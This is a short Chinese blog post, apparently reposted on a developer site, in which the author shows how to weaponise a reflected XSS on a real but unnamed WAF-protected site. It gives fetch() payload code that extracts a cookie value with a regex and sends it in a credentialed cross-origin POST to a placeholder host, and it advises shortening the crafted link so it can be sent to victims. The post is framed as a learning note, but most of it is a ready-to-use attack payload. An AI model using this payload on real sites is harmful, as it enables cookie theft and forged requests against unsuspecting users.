内容简介:偶然间发现某站有个漏洞因为有WAF不好利用,我之前是不知道能咋利用,然后大佬说能XSS利用,叫我写个fetch利用,
偶然间发现某站有个漏洞
因为有WAF不好利用,我之前是不知道能咋利用,
然后大佬说能XSS利用,叫我写个fetch利用,
我?????
试着去学fetch这个东西了
于是有了此文
正文
首先看看说明文档那个样子 https://segmentfault.com/a/1190000007019545
大致理解了
然后发出一个fetch的post请求
也就是这个样子
fetch("http://192.168.199.141:3000/api/user/",{ method:'POST', headers:{ 'Content-Type': 'application/json' }, body:JSON.stringify({ name:'john', pass:'xioayuan' }) }) .then((response)=>response.json()) .then((responseJsonData)=>{ alert("请求成功"); console.log(responseJsonData); }) .catch((error)=>{ alert(error); })
如果XSS点能利用,就在这里发送一个fetch请求,来作为利用点
假如利用点要用到cookie里面的某些值,我们可以用js来提取cookie里的特定段值,可以写个正则提取比如
document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1')
这样就能提取到key的值了
上面的body是一个json类型,如果是一般类型的我们可以直接写一个这样的JS
var form = 'xxxxxx'+document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1'); fetch('https://api.xxxx.com/add', { method: "POST", mode: "cors", credentials: 'include', headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: form });
直接在url里面构造就行了,然后把链接去生成一个短链接,就算完成了。
这样一个反射XSS的利用还是蛮有意思的。
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- LWN:利用debounce buffer来阻止恶意设备利用DMA窃取信息
- 新医药 Leon Nanodrugs完成1850万欧元A轮融资,利用粒子合成方法提高药物利用率
- JNDI 注入利用工具
- Outlook滥用利用链
- tcache机制利用总结
- LFItoRCE利用总结
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
The Web Application Hacker's Handbook
Dafydd Stuttard、Marcus Pinto / Wiley / 2011-9-27 / USD 50.00
The highly successful security book returns with a new edition, completely updated Web applications are the front door to most organizations, exposing them to attacks that may disclose personal infor......一起来看看 《The Web Application Hacker's Handbook》 这本书的介绍吧!